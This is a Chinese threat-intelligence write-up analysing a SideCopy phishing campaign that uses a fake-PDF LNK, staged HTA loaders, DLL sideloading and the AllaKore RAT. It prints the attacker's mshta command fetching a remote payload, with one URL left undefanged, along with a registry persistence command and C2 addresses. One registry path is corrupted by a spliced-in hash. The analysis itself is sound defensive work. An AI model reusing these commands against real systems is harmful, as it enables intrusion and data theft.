<menu id="guoca"></menu>
<nav id="guoca"></nav><xmp id="guoca">
  • <xmp id="guoca">
  • <nav id="guoca"><code id="guoca"></code></nav>
  • <nav id="guoca"><code id="guoca"></code></nav>

    警惕LNK文件攻擊導致數據竊取!SideCopy近期針對印度地區攻擊活動分析

    上官雨寶2022-07-12 16:28:00

    警惕LNK文件攻擊導致數據竊取!SideCopy近期針對印度地區攻擊活動分析

    事件背景

       近日,安恒信息獵影實驗室捕獲到SideCopy組織疑似針對印度國防部的攻擊樣本,樣本攻擊流程仍然以模仿SideWinder為主,通過釣魚郵件下發包含有惡意LNK文件的壓縮包,該LNK文件偽裝成PDF文件誘使目標運行,運行后下載多階段加載器,最后釋放SideCopy組織常用的遠控工具AllaKoreRAT。

       誘餌文件冒充指揮官副手向陸軍部隊下發指令,完整信函如下。

       攻擊流程如下圖:

    攻擊分析

    01 第一階段

       原始樣本中包含偽裝成PDF文件的LNK文件,運行后將執行C:\Windows\System32\mshta.exe https://tmeew.com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit

       LNK文件中執行的鏈接將跳轉至

    hxxps://tmeew[.]com/assets/carousel/files/LVE_CUM_POSTING_(ARMY_PERS)/jspxtoolkit/jqueryxmlcss.hta。

       該代碼來自開源項目CACTUSTORCH,魔改后的函數參數為data, filename。

      在加載器中對應代碼如下,即傳入數據經base64解碼并解壓到%Temp%目錄下。

       隨后檢測本地是否開啟WindowsDefender,并下載后續負載:

       hxxps://tmeew[.]com/assets/carousel/nttoolkit/ -> C:\\ProgramData\\HP\\jquery.txt;

       hxxps://tmeew[.]com/assets/carousel/cyxtoolkit/ -> C:\\ProgramData\\HP\\jscy.txt

    02 第二階段

       下載的文件jquery.txt仍然是采用base64解碼后解壓的方式得到jquery.hta。

       jquery.hta與一階段jqueryxmlcss.hta的文件邏輯構造相似,增加有反病毒產品檢測,以及參數變更為exeBytes, dllBytes。

      第二階段DLL文件將根據目標機器上安裝的反病毒產品進行后續操作

    檢測到Kaspersky殺毒軟件時,執行以下操作

    ●創建C:\\ProgramData\\gvnntr\\目錄,將C:\\Windows\\System32\\credwiz.exe文件拷貝至該目錄,在自啟目錄以及C:\\Users\\Public\\目錄下創建gvnntrSettings.lnk文件用于啟動credwiz.exe并實現持久化,lnk文件包含指令如下:C:\Windows\System32\cmdexe-/c start /b C:\ProgramData\gvnntr\credwiz.exe

    ●將EXE數據(3b4abb7b29f7f41b30f4ed8d86dc6c8a)寫入%Temp%\\gvnntr\\gvnntr.txt,并將DLL數據(cf134c9ac335f549055fe2eff65e9921)寫入C:\\ProgramData\\newimage.jpg,寫入成功后將newimage.jpg移動至C:\\ProgramData\\gvnntr\\DUser.dll

    ●通過Powershell指令將%Temp%\\gvnntr\\gvnntr.txt重命名為gvnntr.exe

    ●最后執行C:\\Users\\Public\\gvnntrSettings.lnk

    檢測到Avast殺毒軟件時,執行以下操作

    ●創建C:\\ProgramData\\gvnntr\\目錄,將C:\\Windows\\SysWOW64\\credwiz.exe文件拷貝至該目錄

    ?將DLL數據寫入C:\\ProgramData\\newimage.jpg后將newimage.jpg移動至C:\\ProgramData\\gvnntr\\DUser.dll

    ●在C:\\ProgramData\\gvnntr\\目錄下創建gvnntr.bat文件并啟動以實現持久化,gvnntr.bat文件內容如下:REG ADD "HKCU\SOFTWARE\Microsoft\Windows\Cu3b4abb7b29f7f41b30f4ed8d86dc6c8arrentVersion\Run" /V "gvnntr" /t REG_SZ /F /D "C:\ProgramData\gvnntr\credwiz.exe"

    ●直接將EXE數據寫入%Temp%\\gvnntr\\gvnntr.exe

    ●休眠3min后,啟動 C:\ProgramData\gvnntr\credwiz.exe

    檢測到Avira殺毒軟件時,執行以下操作

    在C:\\ProgramData\\gvnntr\\目錄下創建gvnntr.bat文件并啟動以實現持久化,gvnntr.bat內容同上,將EXE數據寫入TXT,DLL數據寫入DUser.dll

    檢測到Quick殺毒軟件時,執行以下操作

    ●創建C:\\ProgramData\\gvnntr\\,將credwiz.exe文件拷貝至該目錄,將DLL數據寫入C:\\ProgramData\\extrafile.txt后移動至C:\\ProgramData\\gvnntr\\DUser.dll

    ●通過BAT文件實現持久化,釋放EXE數據到%Temp%\\gvnntr\\gvnntr.exe

    ●休眠1min,啟動 C:\ProgramData\gvnntr\credwiz.exe

    檢測到WindowsDefender殺毒軟件時,執行以下操作

    ●創建C:\\ProgramData\\gvnntr\\,將credwiz.exe文件拷貝至該目錄,將DLL數據寫入C:\\ProgramData\\newimage.jpg后將newimage.jpg移動至C:\\ProgramData\\gvnntr\\DUser.dll

    ●在C:\\ProgramData\\gvnntr\\目錄下創建gvnntr.bat文件并啟動以實現持久化,將EXE數據寫入%Temp%\\gvnntr\\gvnntr.exe

    ●休眠1min,啟動 C:\ProgramData\gvnntr\credwiz.exe

       Loader下載的另一文件jscy.txt,主要是將上述變量gvnntr更改為vmmbs,其他邏輯均不變。其中EXE數據與DLL數據hash值如下

    072fb8ca7c0dce0888707ccbbd37723d | DLL

    98a0ed81f68297ea804e8209a28b91be | EXE

    03 第三階段

       credwiz.exe啟動后將加載同目錄下的DUser.dll,該DLL的主要功能為啟動%Temp%\\gvnntr\\gvnntr.exe

       gvnntr.exe為最終階段遠控軟件AllaKore RAT。AllaKore是一種公開可用的基于Delphi的RAT,常與CetaRAT一起用于SideCopy的攻擊活動中。AllaKore的惡意功能包括:鍵盤記錄、捕獲屏幕截圖、列出文件夾和文件、上傳/下載文件、竊取剪貼板數據、獲取/更換壁紙。

        此次活動中,該RAT被命名為POISONManager

       其中包含的29553fb6797c15d99bcb2d9e27abd49d組件可關聯到其他AllaKore遠控工具,最終連接到 209.126.80.23:{6391、3281}

       tmeew[.]com解析到162.241.85.104

    思考總結

    01 關聯

        通過樣本特征我們關聯到該組織在今年上半年攻擊活動中的樣本如下。

    02 總結

       SideCopy組織近一年來攻擊活動頻繁,攻擊武器從C#、Delphi發展至Golang,從Windows發展至多平臺,攻擊目標卻始終牢牢鎖定印度國防部。此外,該組織樂此不疲地在攻擊活動中使用LNK偽裝成JPG、Word、PDF等文件,說明此攻擊手段針對特定目標人群有較大的成功率。

       安恒建議廣大用戶謹慎對待未知來源的郵件附件及鏈接,提高對LNK文件攻擊的警惕。如有需要鑒別的未知來源樣本,可以投遞至安恒云沙箱查看判別結果后再進行后續操作。

    文帳來自: 網絡安全研究宅基地

    文件目錄
    本作品采用《CC 協議》,轉載必須注明作者和本文鏈接
    目錄掃描可以讓我們發現這個網站存在多少個目錄,多少個頁面,探索出網站的整體結構。通過目錄掃描我們還能掃描敏感文件,后臺文件,數據庫文件,和信息泄漏文件等等 目錄掃描有兩種方式: ?使用目錄字典進行暴力才接存在該目錄或文件返回200或者403;?使用爬蟲爬行主頁上的所有鏈接,對每個鏈接進行再次爬行,收集這個域名下的所有鏈接,然后總結出需要的信息。
    ACL保護文件目錄?
    2021-09-24 08:29:06
    ACl (Access Control List),主要目的是提供傳統的 owner、group、others 的 read、write、execute 權限之外的特殊權限需求設置。
    大意就是這不一定是完整的代碼,請大家fck 微軟。windows_research_kernel目錄: 這個目錄下有兩個壓縮包,一個是Windows Kernel Source Code like,一個是wrktools。接下來是 microsoft-gaming-zone和 misc_microsoft_gamedev_source_code兩個跟游戲開發有關的源碼包。包括在’’是截至2020-08-21的最新版本。然后是Windows 2000 Native API ,里面有C語言的示例及原始API代碼。,XP的源碼,收集的人賣了個關子,加了密,要自己破解。Pdf目錄: 搜集的一些文檔,比如2017年win10泄露32T源碼事件等。Xbox目錄 三個文件如下,可以看到最下面的是一個2020年5月剛泄露的版本。
    ACl (Access Control List),主要目的是提供傳統的 owner、group、others 的 read、write、execute 權限之外的特殊權限需求設置。ACL 可以針對單一使用者、單一文件或目錄來進行 r、w、x 的權限規范,對于需要特殊權限的使用狀況非常有幫助
    Linux常用命令總結
    2021-11-20 05:45:17
    系統信息 關機網卡命令 文件目錄 find命令 ps命令 防火墻命令 用戶命令 其他命令 最近再使用Linux感覺Linux系統使用起來也挺順手的不過就是命令掌握的并不是很牢固,今天整理一下Linux一些常用命令。
    根據臺積電的公告,導致數據泄漏的第三方供應商是中國臺灣系統集成商Kinmax Technology,但未透露泄露數據的性質。“事件發生后,臺積電已立即按照該公司的安全協議和標準操作程序終止與該供應商的數據交換。”但是“國家危害機構”表示,準備發布一份所謂的臺積電網絡“入口點”清單以及相關的密碼和登錄信息。臺積電和Kinmax均未公開證實LockBit宣稱的獲取了臺積電關鍵數據的說法。
    目前支持的功能有:爬蟲、目錄爆破、端口探測、C段探測、子域名探測、fastjson檢測、xss探測、指紋識別、漏洞掃描、漏洞告警。
    經過我花了數小時仔仔細細,認認真真把 x64dbg 手冊翻了個遍,終于我悟了,老王他不行,我行!
    上周四,勒索軟件團伙LockBit宣稱已成功入侵臺積電的系統,并要挾臺積電支付7000萬美元的贖金,否則就將公開其竊取的信息。他們表示,臺積電必須在8月6日之前支付贖金。臺積電在聲明中指出,客戶不必擔心這次攻擊,并解釋稱,其每個硬件組件在安裝到臺積電系統之前都經過一系列廣泛的檢查和調整,包括安全配置。臺積電還承諾幫助其供應商提高安全意識,并表示將確保他們遵守安全標準。
    8、獲取文件目錄,dir9、利用模塊收集信息WIN-5FMG87H62FN:C:\phpstudy_pro\WWW $ :system_info -info uname
    上官雨寶
    是水水水水是
      亚洲 欧美 自拍 唯美 另类